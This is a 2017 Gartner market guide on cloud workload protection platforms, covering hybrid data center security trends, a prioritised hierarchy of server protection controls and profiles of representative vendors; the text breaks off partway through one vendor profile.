Market Guide for Cloud Workload Protection

Platforms
Published: 22 March 2017 ID: G00302941

Analyst(s): Neil MacDonald

Server workloads in modern hybrid data centers use private and public
cloud computing and require a protection strategy different from end-user-
facing devices. Security and risk management leaders should use risk-
based models to prioritize evaluation criteria for cloud workload protection
platforms.

Key Findings
Enterprises are implementing hybrid data center architectures, with workloads running on-
premises and in multiple cloud infrastructure-as-a-service providers.
The increasing adoption of containers complicates workload protection strategies.
Elastic, cloud-native applications have unique security needs. Legacy on-premises security
agents are not designed to perform at cloud scale and may have licensing models that are
incompatible with elastic cloud workloads.
Cloud workload protection platform vendors are emerging to address these requirements,
including many smaller startups, which is confusing buyers.
Signature-based, anti-malware scanning provides little value for most server workloads.

Recommendations
Security and risk management leaders tasked with acquisition, strategizing and planning should:

Not assume end-user endpoint protection platforms are best-suited to private and public cloud
workloads, which have vastly different protection requirements.
Require vendors to support the visibility and control of workloads that span physical and virtual
machines, containers and multiple public cloud IaaS, all from a single policy management
framework and console.
Require vendors to support native integration with VMware, Amazon Web Services and
Microsoft Azure APIs and labeling for policy management.
 Disable antivirus on most servers, and use application control and whitelisting as the primary
protection strategy, unless the server hosts a file-sharing repository.
Require vendors to API-enable security protection functions to be automated and integrated
into DevSecOps-style workflows for scanning prior to deployment.

Strategic Planning Assumptions

By 2019, 60% of server workloads will use application control in lieu of antivirus, which is an
increase from 30% in 2017.

By 2018, three of the top five cloud workload protection platform (CWPP) vendors will have added
explicit support for container visibility and policy enforcement on a per-container-basis.

Market Definition
The market for CWPPs is defined by workload-centric security protection solutions, which are
typically agent-based. They address the unique requirements of server workload protection in
modern hybrid data center architectures that span on-premises, physical and virtual machines
(VMs) and multiple public cloud infrastructure as a service (IaaS) environments. Ideally, they also
support container-based application architectures. Vendors competing in this market offer one or
more of the following capabilities for hybrid cloud workload protection.

Core Capabilities:

Configuration and vulnerability management

Network segmentation, isolation and traffic visibility
System integrity measurement, attestation and monitoring
Application control
Memory protection, including exploit prevention

Extended Capabilities:

IaaS data at rest encryption and encryption key management

Endpoint detection and response for servers e.g., a host-based intrusion detection system
(HIDS)
Host intrusion prevention systems (HIPSs) and vulnerability shielding
Network encryption and tunneling services
Deception capabilities

Page 2 of 25 Gartner, Inc. | G00302941

 Anti-malware scanning

Capabilities that augment/verify foundational operational controls:

Vulnerability and configuration assessment

Multifactor authentication for administrators and basic privileged account management
Log management and monitoring

Market Direction
Modern data centers support workloads that run in physical machines, VMs, containers, private
cloud infrastructure and almost always include some workloads running in one or more public cloud
IaaS providers. Hybrid CWPP offerings provide information security leaders with visibility and
control across all of these environments with a "single pane of glass" a consistent way to
manage policy and monitor for issues.

Although traditional endpoint security vendors (see "Magic Quadrant for Endpoint Protection
Platforms") may tell potential customers to use the same product and set of controls to protect
server workloads as they do for protecting end-user desktops, this won't work (at least not well).
The protection and compliance requirements of private and public cloud workloads are different
enough that the market has bifurcated to address distinct market needs those that protect server
workloads and those that protect devices that directly support end users, such as desktops,
laptops and mobile devices. To directly address the unique requirements of cloud workload
protection, several of the traditional endpoint protection platform (EPP) vendors have developed
specific CWPP offerings, and new point solution vendors have emerged.

Several key trends are affecting the growth and development of the CWPP market.

Server workloads have fundamentally different protection requirements, especially in public

clouds. Servers lead very different lives than end-facing endpoints. Although end users routinely
interact with unknown executable code, server workloads are almost always restricted to a well-
defined set of activities. In VM environments, this is typically one application per VM. In container-
type environments, this can be down do a single process or application service. Thus, it is more
effective to apply a default deny application control (also referred to as whitelisting) model to server
workloads than it is on end-user-facing endpoints.

There are other significant differences. Cloud-style applications tend to scale elastically, requiring
protection to scale up and down on demand with usage-based licensing models that reflect this.
Simply running agents designed for on-premises servers and hoping these will work in IaaS is not
sufficient.

Public cloud IaaS also changes the requirements. For example, encryption of data at rest should be
considered a mandatory best practice for public cloud-based servers (see "How to Make Cloud
IaaS Workloads More Secure Than Your Own Data Center"), although this is rarely a requirement in

Gartner, Inc. | G00302941 Page 3 of 25

 on-premises data centers. Finally, most organizations have a stated intention to standardize on at
least two IaaS providers, in addition to private cloud infrastructure, creating the need for solutions
that support hybrid and heterogeneous cloud environments.

There is a changing threat environment. Another trend is the increased focus on server workload
protection from advanced targeted threats that bypass traditional perimeter and signature-based
protection. Typically, these attacks are financially motivated and target server and application
workloads as a way to get to sensitive data or transactions. Advanced attacks have driven several
key changes in server workload protection:

Protection models that don't rely on signatures. The primary protection strategy for CWPP
(including container-based implementations) will be based on application control restricting
what applications can run to a predefined set based on policy so that all other code,
malicious or not, is blocked by policy.
The need for network traffic isolation, segmentation and visibility. Advanced attacks will
gain a foothold on one system and then spread laterally (east/west) within data centers. The
ability to more granularly segment data center traffic is another key requirement. To help
organizations understand application flows, visibility and visualization of these flows is also an
emerging use case for CWPP.

There is a need for deployment speed. In many cases, cloud server workload instantiation will be
driven by templates and scripts, requiring security protection vendors to open up their protection
capabilities via APIs for automated provisioning. DevOps operating models need to incorporate
security protection as well (see "DevSecOps: How to Seamlessly Integrate Security Into DevOps").
As a result, security requirements captured during development can be expressed in security
controls at runtime, without the need for expensive "human middleware" to program the security
infrastructure. This creates a need for security controls to become automatable and adaptive to
scale up and down, as workloads come and go. Enterprises can't slow down to rely on a human
being to go to a console and set policy. This drives a need for full programmability of the protection
infrastructure via APIs.

Application development is changing. Combined with the need for deployment speed, developers
have embraced containers as a way to slipstream the delivery of new services from development
into production quickly and with high fidelity. Securing container-based deployments also changes
the requirements for CWPPs to, at a minimum, provide visibility into containers (see "Security
Considerations and Best Practices for Securing Containers"). Ideally, CWPPs should protect
containers as just another abstraction and option for deployment at runtime. Containers should be
protected throughout this life cycle. As a best practice, they should be scanned for known
vulnerability and configuration issues before they are released into production. Some of the leading
CWPP vendors don't yet have container support. To fill this gap, several new vendors in the CWPP
market are designed solely for container-based development and deployments.

There is a shift toward immutable infrastructure. Ideally, as enterprises change their application
architectures to containers and phase out legacy applications, the enterprise should not directly
manage live workloads and systems at all. Live systems will be considered immutable an
operational model in which no configuration changes, patches or software updates are allowed on

Page 4 of 25 Gartner, Inc. | G00302941

 production systems. Patches and updates are applied to the base images and layers, then the
production workloads are replaced, rather than serviced. An immutable infrastructure mindset will
change traditional security models. With immutable infrastructure in well-managed environments,
CWPP protection will shift to a focus on application control and container lockdown at runtime, with
a stronger emphasis on scanning in development, before workloads are deployed into production.

The legal and regulatory environment is changing. Many server workload protection
requirements are influenced or are direct requirements to comply with legal and regulatory
frameworks. A good example is the requirements for the protection of Payment Card Industry (PCI)-
related workloads specifically, file integrity monitoring, HIDS, patch management, anti-malware
scanning or whitelisting (see Note 1), and network isolation. Likewise, the pending requirements for
the European Union's (EU's) General Data Protection Regulation (GDPR) has reignited concerns
around data residency, driving interest in data-at-rest encryption in public cloud IaaS, with
customer-managed keys architected so that the cloud provider has no access to the keys.

These trends are creating requirements that are significantly different from traditional end-user-
facing endpoints and traditional physical servers. To address this, several new vendors with
dedicated CWPP point solutions have emerged targeting the needs of hybrid cloud server workload
protection. Information security leaders and architects must understand that simply running an
agent-based solution designed for dedicated physical servers in newer hybrid cloud and container
architected server applications won't work.

Market Analysis
A large number of vendors offer CWPP solutions that vary widely in their capabilities. We
recommend that organizations apply a risk-based security strategy when developing their server
workload protection strategy. All workloads do not require equal levels of protection. Some
workloads will host less-sensitive data and require fewer controls. Others with extremely sensitive
data are likely to use more controls. Others may be protected behind network-based controls, such
as firewalling and intrusion protection systems (IPSs), and require less protection from within the
host. With this in mind, we have created a hierarchy of workload protection needs (see Figure 1) to
help enterprises prioritize their security investments and to help evaluate vendors with capabilities in
this market:

Gartner, Inc. | G00302941 Page 5 of 25

 Figure 1. Cloud Workload Protection Controls Hierarchy

Source: Gartner (March 2017)

Figure 1 graphically illustrates our recommended prioritization of security controls for hybrid cloud
server workload protection. Capabilities toward the bottom of the pyramid are more critical
(foundational), whereas those toward the top are less important. However, depending on the
specific risk profile of the server and the legal/regulatory requirements of the workload and the
geography, enterprise may weight their evaluations differently. Some of the capabilities shown may
be supplied by the OS provider, cloud IaaS provider or another tool within IT operations (e.g.,
configuration and patch management). Finally, servers hosting virtual desktop infrastructure (VDI)
are a different use case, and would use a more-traditional end-user endpoint protection strategy
(see Note 2).

Start with solid operational hygiene. At the bottom of Figure 1 is a square box of foundational
operational capabilities. Solid server security starts with good operational hygiene. For many
organizations, the operational processes and technical solutions for delivering these capabilities are
already in place and should be extended to cloud-based workloads, including:

Restricted access to the server. Server workloads should have restricted access both
physically and virtually restricting who or what can reach the server.

Page 6 of 25 Gartner, Inc. | G00302941

 Restricted ability for arbitrary code to be placed onto the server. Local browsers and email
clients should be removed or disabled. On physical servers, USB ports, Wi-Fi and 3G modems,
similar ways to introduce or remove data should be removed or disabled.
Tight controls around administrative access to the server workloads. Multifactor
authentication or other forms of strong authentication beyond simple usernames and
passwords should be mandatory. In addition, strict controls and processes around the issuance
of administrative credentials should be put in place, using privileged account management
(PAM) systems (see "Market Guide for Privileged Access Management").
Well-defined change management processes. Ideally, these changes would be controlled
and managed in conjunction with a PAM system. If runtime changes are allowed at all, changes
to workload images should follow a defined change management control process linked to the
trouble-ticketing system.
Log management. The server workload OS and applications logs should be gathered into a log
management system or a security information and event management (SIEM) system. The PAM
logs should be managed as well. In virtualized and cloud environments, logs of the activities of
cloud administrators should also be managed for example, Amazon Web Services (AWS)
CloudTrail logs.

Above this foundational operational hygiene level of controls, the following controls should be
considered mandatory for the protection of server workloads:

Configuration and vulnerability management, ideally scanning before release into production
Network firewalling, segmentation and traffic visibility
System integrity monitoring/management
Application control (whitelisting)
Exploit prevention and memory protection

Beyond the capabilities listed above, there are other ways that server workloads may be further
protected. The need for additional protection will be based on multiple factors, including
compliance requirements; the sensitivity of the workload protected; the presence of other mitigating
controls, such as a network firewall or network IPS; and whether or not the server can be patched in
a timely manner; and the risk tolerance of the enterprise.

Cloud Workload Protection Platform Details

The following is a more detailed description of what we consider to be the key capabilities of
solutions that compete in this market. The core components of a server protection platform are:

Hardening, configuration and vulnerability management. Unnecessary components, such as

Telnet, FTP and other services, should be removed. Images should be hardened using industry
standard guidelines as the starting point. This layer may be managed by IT operations, but
information security is responsible for ensuring that systems are hardened and configured according

Gartner, Inc. | G00302941 Page 7 of 25

 to the organization's standard guidelines, and that systems are kept patched and up-to-date in a
timely manner, according to the organization's patching policies. In many cases, this functionality
will be achieved using an external scanning tool or service for example, Qualys, Tenable Network
Security (Nessus) and Rapid7. Some of the CWPP solutions in this Market Guide can also assess
the system configuration and vulnerability from the "inside out," using their agents to provide this
visibility. Ideally, vendors would provide automatic policy recommendations for the workload-
hardening base on the workload's contents.

Workload segmentation, traffic visibility and optional network traffic encryption. A foundation
of solid workload security is isolation and segmentation of its ability to communicate with external
resources. Some of the workload protection solutions provide their own firewalling capabilities,
whereas others manage the built-in firewalls of Windows and Linux. The solution should support the
emerging requirement for "microsegmentation" (more-granular segmentation) of east/west traffic in
data centers. In addition, several of the solutions provide visibility and monitoring of the
communication flows. Visualization tools enable operations and security administrators to
understand flow patterns, set policies and monitor for deviations. Finally, several vendors offer
optional encryption of the network traffic (typically, point-to-point IPsec transport mode security
associations) among workloads for the protection of data in motion, and provide cryptographic
network isolation among workloads.

System integrity monitoring/management. Capabilities here span two areas:

The ability to measure the BIOS, hypervisor, VM and container system images before they are
loaded this is typically achieved using trust measurements rooted in hardware for physical
systems. In the public cloud, this will be limited to measuring the integrity of the system images
and containers before mount.
The real-time monitoring of the integrity of critical system files after the workloads are booted.

More-advanced solutions also monitor the integrity of the Windows registry, startup folders, drivers
and bootloader. File integrity monitoring (FIM) is a requirement of multiple regulations, including PCI,
and is a precursor to more-advanced endpoint detection and response (EDR), similar to the
capabilities discussed below. Like antivirus, the value of FIM alone is questionable; however, it may
be required by auditors.

Application control (whitelisting). Most workloads in on-premises VMs and in public cloud IaaS
run a single application. This is almost always the case with containers hosting microservices-based
applications. The use of whitelisting to control what executables are run on a server provides an
extremely powerful security protection strategy. All malware that manifests itself as a file to be
executed is blocked by default. Many CWPP solutions provide built-in application control
capabilities, or dedicated point solutions offer them. Alternatively, the built-in application control
capabilities of the OS might be used, such as software restriction policies, AppLocker and Device
Guard with Windows, or SELinux, or AppArmor with Linux. Some of the application control vendors
can further constrain the runtime behavior of whitelisted applications, using more-granular policy
enforcement.

Exploit prevention and memory protection. Application control solutions are fallible and should be
combined with exploit prevention and memory protection capabilities, either from the OS for

Page 8 of 25 Gartner, Inc. | G00302941

 example, ASLR (see "Address Space Layout Randomization" [Wikipedia]) and seccomp (see
"seccomp" [Wikipedia]) the application control solution, or a third party to protect from the
scenario in which a vulnerability in a whitelisted application is attacked, and the injected code runs
entirely from memory and doesn't manifest itself as a separately executed and controllable file
(referred to as fileless malware). In addition, exploit prevention and memory protection solutions can
provide protection from attacks, without the overhead of traditional, signature-based antivirus
solutions, and can be used as a mitigating control when patches are not available.

Additional CWPP layers include:

IaaS data-at-rest protection. Encryption of data at rest should be a standard best practice for
workloads running in public cloud IaaS (see "How to Make Cloud IaaS Workloads More Secure
Than Your Own Data Center"). With the use of Intel's AES-NI for cryptographic operation
acceleration, the impact on performance is minimal. In addition, many enterprises are making this a
standard requirement in their on-premises data centers. We have not made this a core requirement
for CWPP selection, because many OSs now provide full drive encryption for free and support a
"headless" mode specifically for server protection scenarios. In addition, Amazon also provides free
full-volume encryption in AWS (see "Amazon EBS Encryption"), as well as free solutions for RDS
and S3. Microsoft provides a similar capability with Azure Disk Encryption (see "Cloud Security
Controls Series: Encrypting Data at Rest"). With any encryption, there is a need for the secure
storage and management of encryption keys, and the need to support customer-managed keys.
More-advanced solutions support features such as key management, cross-cloud encryption and
automatic key rotation.

Server EDR for behavioral monitoring. Beyond the core system integrity monitoring discussed
above, this type of monitoring looks at behaviors such as network communications, processes
launched, files opened and log entries for behavior patterns that indicate malicious activity,
including within containers. Another technique is to establish patterns of expected behaviors from
whitelisted applications and look for deviations in behavior. In addition, several of the EDR vendors
specifically target server workload protection use cases (see "Market Guide for Endpoint Detection
and Response Solutions"). These capabilities are focused on detection and response, rather than
prevention of attacks. Monitoring server workloads for anomalous behavior should be considered a
best practice, although some organizations will achieve this with network-based monitoring, rather
than host-based agents. Thus, we haven't made this a core requirement of CWPP. Another common
use case will be to quickly scan all systems for the presence of a specific file by name or hash in the
event of an outbreak. This is a legacy vestige of signature-based antivirus scanning, but is used in
detection/response scenarios.

Host IPS including vulnerability-facing HIPS. Here, in addition to traditional network IPS
protection against known attacks, the CWPP vendor deeply inspects the incoming network traffic
stream for attacks against known vulnerabilities and prevents them. This layer may be redundant
with network IPSs protecting the data center; however, those may not protect from inter-VM or inter-
container-based attacks. HIPS becomes a valuable defense in depth control to shield from attacks
on a zero-day vulnerability until the patch can be applied or the VM/container is rebuilt and is used
by some organization to reduce the frequency of server patching. This type of protection may also

Gartner, Inc. | G00302941 Page 9 of 25

 be critical for protecting servers that cannot be patched easily or that are no longer supported with
patches by the vendor (such as Windows Server 2003, which fell out of support in 2015).

Deception. This emerging security protection capability creates fake vulnerabilities, systems,
shares, cookies, etc. If an attacker tries to attack these fake resources, it is a strong indicator that
an attack is in progress, as a legitimate user should not see or try to access these resources.
Deception technologies for network, application, endpoint and data are discussed in "Emerging
Technology Analysis: Deception Techniques and Technologies Create Security Technology Business
Opportunities." Some of these solutions are agent-based on the server workload and thus fall under
the scope of this research.

Signature-based antivirus. Signature-based antivirus provides little to no value on well-managed

server workloads. As stated earlier, our recommendation is to use an application control whitelisting
model as the primary control for server workload protection. One exception would be if the server
workload is serving as a general-purpose file repository for example, a file share, a Network File
System (NFS) server, an FTP server or a SharePoint server. In these cases, the file repository should
be scanned, but this can be performed externally. Another exception would be where regulatory
requirements specify the use of antivirus and it is not negotiable with the auditor. Here, basic file
system scanning to meet compliance requirements using a minimal open-source software (OSS)
engine, such as ClamAV, is a possible strategy. Alternatively, use your incumbent endpoint antivirus
solution (configured to minimize the impact on server performance by disabling real-time scanning
and reducing the frequency of on-demand scans), which has the advantage of being managed
under the same policy management system as other endpoints.

The above CWPP capabilities are what we expect to be running within a workload. However, as
information security architects develop a complete protection strategy for server workloads, Cloud
Workload Security Services (CWSS) external to the workload that surround the workload at the data
plane layer should also be considered (see Figure 2), which are outside the scope of this research.
These optional capabilities provide application-specific protection, such as web application
firewalling (WAF), database activity monitoring, load balancing, and network-based firewalling and
IPS.

Finally, in private and public cloud-based environments, there is a set of surrounding control plane
infrastructure services that are used to provision/deprovision, configure and manage the workload.
For example, identity and access management (IAM) services, network connectivity, network
configuration and storage configuration (see Figure 2). Several of the CWPP vendors in this Market
Guide have begun offering CISPA capabilities. In addition, an emerging set of vendors outside the
scope of this research provide cloud infrastructure security posture assessment (CISPA) capabilities
(e.g., Evident.io and CloudCheckr).

Page 10 of 25 Gartner, Inc. | G00302941

 Figure 2. Cloud Workload Protection Outside of the Workload CWSS and CISPA

Source: Gartner (March 2017)

CWPP Architectural Considerations

When evaluating CWPP solutions, several key architectural considerations vary among the solution
providers:

Support for hybrid cloud environments. One of the most critical considerations is that the
solution work in hybrid cloud environments that span on-premises workloads, VMs, containers
and deployments in public cloud IaaS from multiple cloud providers. For enterprises that still
have physical servers, support for these may be a requirement.
Server OSs supported. Most vendors support Windows and Linux. If Linux is supported, look
for specific support of your enterprise distributions and both 32- and 64-bit support, and
whether the product is at feature parity with Windows. If Windows is supported, then clarify
which versions and whether both 32- and 64-bit versions are supported. Few vendors support
HP-UX, IBM AIX or Oracle Solaris. Some vendors also specialize in supporting out-of-support
server OSs, such as Windows 2000 Server and Windows Server 2003.
Container support. Host-based agents need to be able to distinguish and apply policies based
on individual Linux containers, including network segmentation. This is an emerging critical
requirement for organizations using containers to support microservices-style architectures and

Gartner, Inc. | G00302941 Page 11 of 25

 rapid DevSecOps workflows. Three primary methods are being used to protect container-based
workloads at runtime. A more-traditional architecture with agents running in the host OS may be
used if the agent is enlightened/aware of containers. Alternatively, a "privileged" container can
be used as a peer to the other containers a security container and then using the
container management system to provision these one per physical host (see "Security
Considerations and Best Practices for Securing Containers"). Another approach is to "inject" or
layer the security controls into each container as they are constructed before release into
production.
Full API enablement. Increasingly, security protection needs to be automatically applied to
workloads in DevSecOps-style workflows. Rather than requiring expensive and slow manual
configuration via "human middleware" to configure security policy via consoles, security policy
is applied automatically via APIs using the scripts, recipes and templates common in highly
automated development environments. All functionality available in the console should be
available via APIs, and, ideally, the console is built on the vendor's APIs.
SDL integration. As enterprises shift to more-rapid DevSecOps-style development, security
scanning needs to be integrated directly into the continuous integration/continuous delivery
(CI/CD) toolchain. As new workloads are created via tools such as Chef and Puppet, or when
using cloud management platforms, such as OpenStack, the security policy can be applied
automatically via APIs.
Impact on runtime performance. Depending on the capabilities the CWPP delivers, there may
be a measurable impact on the system footprint and performance. For example, deep-packet-
inspection-based HIPS can be resource-intensive. Encryption should use hardware acceleration
capabilities, such as Intel's Advanced Encryption Standard New Instructions (AES-NI), if
available (see "Intel Data Protection Technology With AES-NI and Secure Key Delivers Fast,
Affordable Data Protection and Security"). Signature-based anti-malware scanning creates a
measurable impact on performance, if real-time scanning is kept activated, and when crawling
and scanning the file system.
"Agentless" protection. In VMware environments, multiple providers have linked into its
vSphere hypervisor APIs for agentless anti-malware scanning. One vendor, Trend Micro,
supports agentless file integrity monitoring. With VMware's NSX, agentless IPS is possible and
several vendors support this deployment option, including several CWPP vendors. With
container-based architectures, several vendors avoid traditional agents and use a privileged
container model to enforce security policy. Finally, Bracket Computing uses an innovative
"wrappering" approach that protects individual workloads without the use of agents.
Native integration and support for leading virtualization and cloud providers. For effective
protection in cloud-based environments, the CWPP should understand and integrate with native
tagging capabilities of the platform, so that policies can be applied based on these tags.
Furthermore, integration with the APIs of the cloud provider can signal the console when new
workloads have been created, potentially without security protection installed. Finally,
understanding the native segmentation of the cloud provider, such as network and security
groups, will help in defining segmentation strategies.

Page 12 of 25 Gartner, Inc. | G00302941

 Management console capabilities. Full role-based access control supporting administrators
with different responsibilities should be considered mandatory across all server workloads,
regardless of location. Some vendors provide a multitenant "console in the cloud" option so
that no local management server is required. This is useful for smaller enterprises that don't
want the hassle, complexity and cost of setting up their own management server.
Compliance reporting. For organizations with specific regulatory requirements, the ability to
provide specific compliance reports reduces the workload when auditors ask for evidence of
compliance (for example, PCI and HIPAA compliance reporting).
Ability to securely bootstrap. Systems that are rapidly provisioned with security agents
embedded may not be able to know in advance the policies that will need to be applied at
runtime. The agents should be able to be provisioned using templates and upon boot, and to
securely reach out, download and apply the appropriate policy, based on the context of the
workload (e.g., the location of the workload or based on its tagging).
Pricing model flexibility. The ideal solution enables the enterprise to pick and choose the mix
of licensing models that makes the most sense for them. Most vendors set prices using a
subscription model of per VM, per year. Others offer pricing per CPU socket. For highly elastic
workloads, a pricing model based on actual usage in VM or container hours or minutes, or other
usage-based metrics, may be the better choice.
Auditing and logging. All administrative activities and events in the console should be logged,
and these logs should be exportable to leading SIEM systems.
Threat intelligence and community intelligence. The vendor's lab research capabilities
should provide global threat intelligence to inform security operators of changing attack
patterns and trends, and, ideally, feed directly into its protection solution. The vendor's
customer community should enable participants to share visibility and intelligence information
to better protect from threats.

Representative Vendors
The vendors listed in this Market Guide do not imply an exhaustive list. This section is intended to
provide more understanding of the market and its offerings.

The following vendors offer solutions designed to satisfy at least some of the requirements noted in
the previous section. The capabilities that each vendor focuses on are summarized in Table 1.

Gartner, Inc. | G00302941 Page 13 of 25

 Lab
AWS

Page 14 of 25
Illumio
Apcera

Dome9
Vendor

HyTrust
Bracket

Security
Inspector

Kaspersky
Computing

GuardiCore
CloudAware

Cloud Raxak
Protection
Carbon Black
Aqua Security

CloudPassage

x
x
x
x
x
x
x
x
Hardening, configuration and vulnerability scanning

x
x
x
x
x
x
x
x
Network firewalling, segmentation and visibility

x
x
x
x
x
x
x
x
x
System integrity measurement and monitoring

x
x
x
x
x
x
Application control

x
x
Memory protection

x
x
x
x
x
Server EDR; HIDS; behavioral monitoring

x
x
IaaS data-at-rest encryption

HIPS with vulnerability shielding

x
Deception

x
x
Anti-malware scanning

x
x
x
x
Privileged account management

x
x
Table 1. CWPP Vendor Capability Focus Areas. "X" Indicates an Area of Focus

Change management

x
x
Log management and monitoring

x
x
x
x
x
x
x
x
x
x
x

Windows

x
x
x
x
x
x
x
x
x
x
x
x

Linux

x
x
x
x
x
x

Docker containers on Linux

x
x
Legacy Unix

x
x
x
x
x
x
x
x

VMware

x
x
x
x
x
x
x
x
x
x

Gartner, Inc. | G00302941

AWS

x
x
x
x
x
x
x
x
x

Azure
 Cloud

(virtual
Insight
Vendor

McAfee

Sophos

Tripwire
Layered

vArmour
Services
Qingteng

Twistlock
Microsoft

Symantec

appliance)
Trend Micro
Threat Stack

Gartner, Inc. | G00302941

x
x
x
x
x
x
x
x
Hardening, configuration and vulnerability scanning

Source: Gartner (March 2017)

x
x
x
x
x
x
x
Network firewalling, segmentation and visibility

x
x
x
x
x
x
x
System integrity measurement and monitoring

x
x
x
x
x
x
Application control

x
x
x
x
Memory protection

x
x
x
x
x
x
x
Server EDR; HIDS; behavioral monitoring

x
IaaS data-at-rest encryption

x
x
x
HIPS with vulnerability shielding

x
x
Deception

x
x
x
x
x
Anti-malware scanning

Privileged account management

x

Change management

x
x
Log management and monitoring

x
x
x
x
x
x
x
x
x

Windows

x
x
x
x
x
x
x
x
x
x

Linux

x
x
x
x
x
x
x

Docker containers on Linux

x
x
x
x
x
x

Legacy Unix

x
x
x
x
x

VMware

x
x
x
x
x
x
x

Page 15 of 25
AWS
x
x
x
x

Azure
 Amazon
In 2016, AWS released an agent-based solution to scan Linux and Windows server workloads for
the presence of vulnerabilities and incorrect configuration. The agent is designed so that the scans
are implemented before workloads are placed into production in AWS, as well as scanning on-
demand, once they are in production. The agent integrates with many AWS APIs such as AWS IAM
for role-based authorization for managing assessments, the Amazon EC2 tagging API for grouping
systems and assessments, AWS CloudTrail for auditing, and Amazon SNS for workflow and
notifications related to assessments. Outside and independent of Amazon Inspector, agentless
data-at-rest encryption is available at no cost for Windows and Linux workloads via Amazon EBS
Volume Encryption. In addition, AWS Config, AWS Config Rules, Amazon CloudWatch and AWS
Multi-Factor Authentication provide additional, non-agent-based workload protection capabilities.

Apcera
Apcera provides a container management and orchestration platform for container-based
workloads, where the security is baked into its architecture. As such, it is not a traditional add-on
CWPP security solution. The use of Apcera requires the adoption of its enterprise container
management model a decision typically driven by DevOps teams and application architectures,
not security. As a key stakeholder, the security capabilities of the Apcera platform provide built-in
policy enforcement for container configuration, container lockdown, container-level network
isolation and segmentation ("nanosegmentation"), as well as full visibility, auditing, logging and
alerting of its container environment.

Aqua Security
Aqua Security is a pure-play startup focusing on the security requirements of container-based
workloads. It provides container life cycle management and protection, from development into
operations, including container management services running in AWS and Azure. In development,
Aqua integrates into the CI/CD pipeline and scans container repositories against known common
vulnerabilities and exposures (CVE), configuration and other risks. For runtime protection, rather
than use an agent in the host OS, Aqua uses an architecture in which a privileged container is run as
a peer to the other provisioned containers on the host OS. Its runtime protection includes locking
down the container runtime environment to enforce controls on namespaces, privileged access to
root, container network segmentation (nanosegmentation) and container activities based on app
control (which it refers to as behavioral whitelisting) The model is created by observing containers
during runtime and using machine learning to whitelist legitimate behavior. Significant policy
violations can be blocked, while other deviations of behavior are monitored and reported delivering
EDR for containers.

Bracket Computing
Bracket uses an agentless wrappering approach enabled by what it calls a "metavisor" to intercept,
secure and control all network and disk communications for Linux-based VMs running in AWS. In
2016, it extended this model to Google IaaS, Microsoft Azure and VMware. Protection starts at
provisioning with preboot image authentication and integrity checking. Then, the workload wrapping
technology provides network microsegmentation and data segmentation combined with

Page 16 of 25 Gartner, Inc. | G00302941

 transparent, always-on network encryption and data-at-rest encryption, including S3 encryption.
Because Bracket's approach doesn't use traditional agents, its controls cannot be disabled by
attacks from within the VM it is protecting; however, it does not yet support containers. In early
2017, it added memory introspection capabilities for Linux protecting against memory-based
attacks and enabling memory dumps for incident response.

Carbon Black
Carbon Black's Cb Protection is best-known for its agent-based application control capabilities with
integrated memory protection, file integrity monitoring, device control and basic behavioral
monitoring for Windows and Linux workloads. It can also monitor workloads for configuration drift
from a defined gold image and stop file-based and fileless attacks by allowing only approved
software to run. In addition, it has a separately available (at additional cost) full EDR offering called
Cb Response. This is installed as a separate agent, providing more-detailed behavioral monitoring,
detection and response capabilities for advanced threats on Windows and Linux server workloads.
No specific API integration for cloud environments is provided.

CloudAware
CloudAware combines a large set of operational and security capabilities targeted at enterprises
with hybrid cloud environments spanning on-premises VMware environments and public clouds,
including AWS, Azure and Google. Its integrated offering includes inventory, cost management,
change management, configuration management, backup and replication services, as well as
integrated security capabilities. Its security capabilities can be deployed agentless or agent-based
for more control. Security agent capabilities include integrated file integrity monitoring based on
OSSEC with HIDS extensions, an integrated Nessus agent for configuration against CIS with
vulnerability assessment and an integrated Clam antivirus agent for anti-malware protection.
CloudAware also includes optional firewall management, a Breeze agent for orchestration and YARA
agent for all workloads at no additional charge. All management and security logs are consolidated
into its embedded ELK stack for single-pane-of-glass-based monitoring, management and
compliance reporting.

CloudPassage
CloudPassage has an agent-based solution with a cloud-based console for Windows and Linux,
providing vulnerability and configuration scanning, network segmentation (by managing the built-in
firewalls of the OS), system integrity monitoring, application control, and log monitoring capabilities
across any combination of public cloud, private cloud and on-premises data centers. In 2016, it
added support for container-based visibility and segmentation. It also provides basic intrusion
detection system (IDS) capabilities from its log monitoring and built-in multifactor authentication for
securing administrative access.

Cloud Raxak
Cloud Raxak has an agentless solution for Windows and Linux workloads (including support for
OpenStack and containers) that focuses primarily on secure boot and configuration management. It

Gartner, Inc. | G00302941 Page 17 of 25

 measures the integrity of all Linux distributions using tools like RPM Package Manager as well as
the correct configuration of Linux and Windows as per industry standards. It is one of two vendors
that can manage TXT-based root of trust measurements for VMware environments. On systems with
bare-metal access, it leverages Intel Cloud Integrity Technology for hardware-rooted secure boot
configuration checks in cloud-based systems over the life cycle of the assets.

Dome9 Security
Dome9 has expanded its strategy to focus on agentless network security visibility and management
for AWS and Azure, which leverages the IaaS platforms' built-in security controls and corresponding
networking and security APIs. Using the AWS and Azure APIs, Dome9 can provide full network
connectivity management and visualization, IAM security visibility and management, as well as
compliance and governance management for IaaS. It also has an optional agent that provides file
integrity monitoring, networking segmentation and protection for on-premises workloads. As such,
Dome9 will increasingly compete with other CWSS and CISPA providers. Dome9 is phasing out its
agent-based solution for Windows and Linux workloads that manages the built-in firewalls of these
OSs for network segmentation.

GuardiCore
GuardiCore focuses on network visibility and segmentation, combined with process-level visibility,
reputation and deception technologies, for the detection of and response to advanced attacks in
hybrid cloud data centers, including physical servers. It can be deployed by integrating with the
underlying virtualization layer and supports deception for server workloads running on VMware
vSphere, NSX and KVM and Xen Project. Alternatively, it can be deployed in-line as a virtual
appliance. For process-based visibility, its solution requires that an agent be installed, with agents
available for Linux, Windows, AWS and Azure images and agentless using network-level integration
with VMware NSX.

HyTrust
HyTrust's core focus is providing strong separation and monitoring of administrative duties for
administrative access in virtualized environments, including controls around virtual network
(including NSX), storage, and hyperconverged, virtualized systems, such as VCE, Nutanix, VxRail,
SimpliVity, Pivot3, Cisco and OpenStack environments. Its capabilities overlap with the PAM market;
however, it offers additional CWPP capabilities, such as system integrity measurements at boot time
and granular policy controls for VMware environments. HyTrust also provides agent-based data at
rest encryption and key management for VM-based environments, such as IBM, Amazon, VMware,
Microsoft and others.

Illumio
Illumio has a centrally managed agent-based solution for Windows and Linux, designed primarily for
workload and application visibility and segmentation by building an application-centric network
topology map with awareness of third-party network controls, such as load balancers, network
switches, firewalls and cloud security groups. The application map is built using flow information
gathered at the host that is then used to provide network flow visibility and manage the built-in

Page 18 of 25 Gartner, Inc. | G00302941

 firewalling capabilities of these OSs and enforcement points in the network and cloud, Optional
